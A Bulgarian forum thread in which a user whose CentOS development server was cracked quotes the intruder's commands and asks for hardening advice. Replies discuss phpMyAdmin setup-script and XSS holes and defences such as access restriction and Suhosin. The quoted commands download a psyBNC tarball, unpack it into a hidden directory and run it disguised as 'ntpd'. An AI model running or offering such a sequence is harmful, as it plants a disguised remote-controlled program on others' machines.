Изпечатай

[rcbandit]

Здравейте,
  Имам прясно инсталиран Centos сървър с Oracle който се ползва за разработка и тестване на PHP приложение. Причинатата за новата инсталация е че вчера кракнаха съръвъра и ето тази беля са направили:

wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
wget http://www.freewebs.com/iulianshooter/psybnc-linux-ro.tgz
tar zxvf  psybnc-linux-ro.tgz
rm -rf psybnc-linux-ro.tgz
cd .bash
chmod +x *
./ntpd

  Днеска инсталирах всичко на ново. Бихте ли ми дали съвет кои базови пакети да махна от съвъра и какви настройки да да направя за да стане трудно кракването. Тези които аз бях направил явно не стигат.

поздрави.

[triel]

http://www.nsa.gov/ia/guidance/security_configuration_guides/operating_systems.shtml#linux2

[rcbandit]

Много благодаря!
   Някой сеща ли си за други източници на подобна инфорация?

[n00b]

И на мен ми бяха хакнали една виртуална машина.

Значи всичко стана през phpmyadmin...

[b2l]

Значи всичко стана през phpmyadmin...

Абе това защо го ползвате изобщо??? Много ми е странно. Примерно аз го имам на сървъра защото съквартиранта ми да може да си създава бази и разни таблици когато ме няма, понеже като сме двамата и заявките ги пиша по-бързо от колкото да цъка из pma.

[n00b]

Значи всичко стана през phpmyadmin...

Абе това защо го ползвате изобщо??? Много ми е странно. Примерно аз го имам на сървъра защото съквартиранта ми да може да си създава бази и разни таблици когато ме няма, понеже като сме двамата и заявките ги пиша по-бързо от колкото да цъка из pma.

Ем щот на хората им е по-удобно в него. Инак и аз бича на конзолата.

Та при мен - в phpmyadmin има дупка някъде в setup скрипта. Подаваш му POST заявка в install.php и говедото направо я изпълнява!

Естественно цирка е пълен.

Решението е да се направи парола на phpmyadmin - което ще ги спре ИЛИ да забраниш влизане в phpmyadmin ОСВЕН ако не е дошло от няколко адреса...

[RealEnder]

Надали е през phpmyadmin (CentOS+ORACLE)
Логовете запази ли? Паролите силни ли бяха? Какво слушаше към Интернет?

[kifavi8024]

100% е дошло от PHP дупка - няма значение каква/къде...
За целта проблема го решавам с Suhosin Patch/Extension(малък мод на php.ini)... И аз много се дразня от тоя прогнил phpmyadmin - затова без да го "обезопася" като му направя рестриктед достъп - просто се забравя за него (:

[gat3way]

Има доста добри GUI клиенти за работа с тая база. Аз ползвам mysqlcc което е леко криво, но пак е по-добро от уеб-базирания клиент. phpmyadmin има доста секюрити проблеми и ако го ползвате, ползвайте най-новата версия. Има няколко експлойта, разчитащи на това да съществува setup (дали не се казваше config?!?) директорията. В нея има един скрипт, който създава конфигурационен файл - е постоянно се измислят някакви гаменски номера да се вмъква код в този файл и тъй като той е PHP скрипт, който сет-ва глобални променливи - кодът се изпълнява. Другите му проблеми са разни XSS изпълнения, чрез които ти завземат сесията стига да имаш лошия късмет да отвориш каквото не трябва, доста версии имат такива проблеми. Дори имаше нещо като пик на хакнати phpmyadmin-и миналата година, който позатихна като си отстраниха бъговете. Аз лично имах доста автоматизирани опити да ми чупят несъществуващ phpmyadmin.